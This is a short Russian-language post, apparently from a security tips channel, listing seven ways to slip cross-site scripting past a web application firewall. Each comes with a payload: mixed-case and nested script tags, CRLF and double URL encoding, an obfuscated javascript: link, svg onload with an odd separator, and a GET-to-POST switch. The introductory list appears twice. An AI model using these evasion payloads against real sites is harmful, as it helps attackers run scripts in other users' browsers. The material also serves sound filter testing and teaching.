📌 Методы обхода XSS фильтров
Вот список из 7 полезных методов, позволяющих обойти WAF (брандмауэр веб-приложений) при использовании XSS в веб-приложении:
▫️Проверьте, не блокирует ли брандмауэр только строчные буквы:
▫️Попробуйте разбить регулярное выражение брандмауэра новой строкой "\r\n" (CRLF injection):
▫️Попробуйте двойное кодирование:
▫️Тестирование на рекурсивные фильтры, если брандмауэр удалит тэг <script>, у нас будет чистая полезная нагрузка:
▫️Инъекция анкор тега без пробелов:
▫️Попробуйте обойти пробелы с помощью маркера:
▫️Попробуйте изменить метод запроса (POST вместо GET):
Вот список из 7 полезных методов, позволяющих обойти WAF (брандмауэр веб-приложений) при использовании XSS в веб-приложении:
▫️Проверьте, не блокирует ли брандмауэр только строчные буквы:
<sCRipT>alert(1)</sCRiPt>
▫️Попробуйте разбить регулярное выражение брандмауэра новой строкой "\r\n" (CRLF injection):
<script>%0d%0aalert(1)</script>
▫️Попробуйте двойное кодирование:
%253Cscript%253Ealert(1)%253C%252Fscript%253E
▫️Тестирование на рекурсивные фильтры, если брандмауэр удалит тэг <script>, у нас будет чистая полезная нагрузка:
<scr<script>ipt>alert(1);</scr</script>ipt>
▫️Инъекция анкор тега без пробелов:
<a/href="j	a	v	asc	ri	pt:alert(1)">
▫️Попробуйте обойти пробелы с помощью маркера:
<svg•onload=alert(1)>
▫️Попробуйте изменить метод запроса (POST вместо GET):
GET /?q=xss#web
POST /
q=xss